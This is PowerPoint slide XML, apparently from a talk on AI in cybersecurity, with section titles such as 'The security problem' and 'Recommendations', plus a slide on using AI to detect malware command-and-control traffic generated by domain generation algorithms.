                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Here are two examples: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1200" b="1" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Identify calls to C&amp;C servers from customer networks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1200" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysing large volumes of log messages</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="31" name="Picture 30">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66186C4-733F-4F12-81C1-569FE1B5DDE9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="21017" b="6173"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-11619" y="1486184"/>
            <a:ext cx="5403098" cy="5397492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6097A56A-AF50-4207-9241-64F6FC530872}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">
            <a:alphaModFix amt="51000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5280" y="1492930"/>
            <a:ext cx="5410150" cy="5438840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9674837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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36833E77-3BD5-48A1-B04E-4E1D995DD581}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9831" y="1486184"/>
            <a:ext cx="12182168" cy="6091084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F5335B9-3D9B-48A4-ACCC-3A23291B8111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323315" y="2750389"/>
            <a:ext cx="4305432" cy="2092881"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>EXAMPLE 1: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Detecting C&amp;C Traffic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="1400" dirty="0">
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Various families of malware use domain generation algorithms (DGAs) to generate a large number of pseudo-random domain names to connect to a command and control (C2) server.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F40AA823-91FF-4159-8D64-0E3B4A4087C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="7170" t="3708" r="37898" b="6559"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7280904" y="1486183"/>
            <a:ext cx="4918419" cy="5371817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="Picture 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B2769E-B1F1-476D-A374-3B7664169F0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix amt="56000"/>
          </a:blip>
          <a:srcRect b="10567"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7280476" y="1489647"/>
            <a:ext cx="4918847" cy="5368354"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27674564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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1469948"/>
            <a:ext cx="11916577" cy="5974839"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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15" name="Hexagon 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA1BA154-7FB8-479A-9D9B-EC3E7E22D8D0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5118112" y="3875661"/>
            <a:ext cx="1986092" cy="1712148"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C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Hexagon 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC904E28-9A15-422D-99FE-486D91188E95}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6741089" y="2995517"/>
            <a:ext cx="1986092" cy="1712148"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C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Hexagon 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40AA9E97-4BF5-43C5-B101-1B93B7F96861}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="3898006"/>
            <a:ext cx="1986092" cy="1712148"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C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Hexagon 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16719C3B-CA6C-4368-A8CF-7F7FFB5EEAC4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10018500" y="2995517"/>
            <a:ext cx="1986092" cy="1712148"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C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Hexagon 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80AF6C70-9C84-43A9-B9E6-BDF9B0EEBBF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3480008" y="2995517"/>
            <a:ext cx="1986092" cy="1712148"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C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Hexagon 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8237669-9B35-4CC8-AB06-3CA267C20022}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1835148" y="3875661"/>
            <a:ext cx="1986092" cy="1712148"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C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Hexagon 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86720D86-9345-4068-AD41-33BF6B992E3A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="196571" y="2976208"/>
            <a:ext cx="1986092" cy="1712148"/>
          </a:xfrm>
          <a:prstGeom prst="hexagon">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="C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TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="1894659" cy="371759"/>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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>
            <a:ext cx="1894659" cy="608331"/>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Getting to </a:t>
            </a:r>
          </a:p>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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>
            <a:ext cx="1894659" cy="608331"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="1894659" cy="371759"/>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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>
            <a:ext cx="1894659" cy="415498"/>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AI and the security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="253916"/>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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="2096929" cy="371759"/>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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36" name="TextBox 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{827755F5-F24A-4DD9-8C3A-BA5E2B4465FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="972365" y="1805393"/>
            <a:ext cx="3026004" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TOPICS TO COVER</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1628229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9CF664A5-5490-4425-8156-3F4009090781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="11858"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1468670"/>
            <a:ext cx="12192000" cy="5388052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{032E0E8A-018D-4E7C-934A-271F713AB12B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1286533" y="2174864"/>
            <a:ext cx="9410504" cy="1664764"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>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17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA322977-A044-44B7-B29D-15D229582974}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1298444" y="4444634"/>
            <a:ext cx="4176487" cy="1292662"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
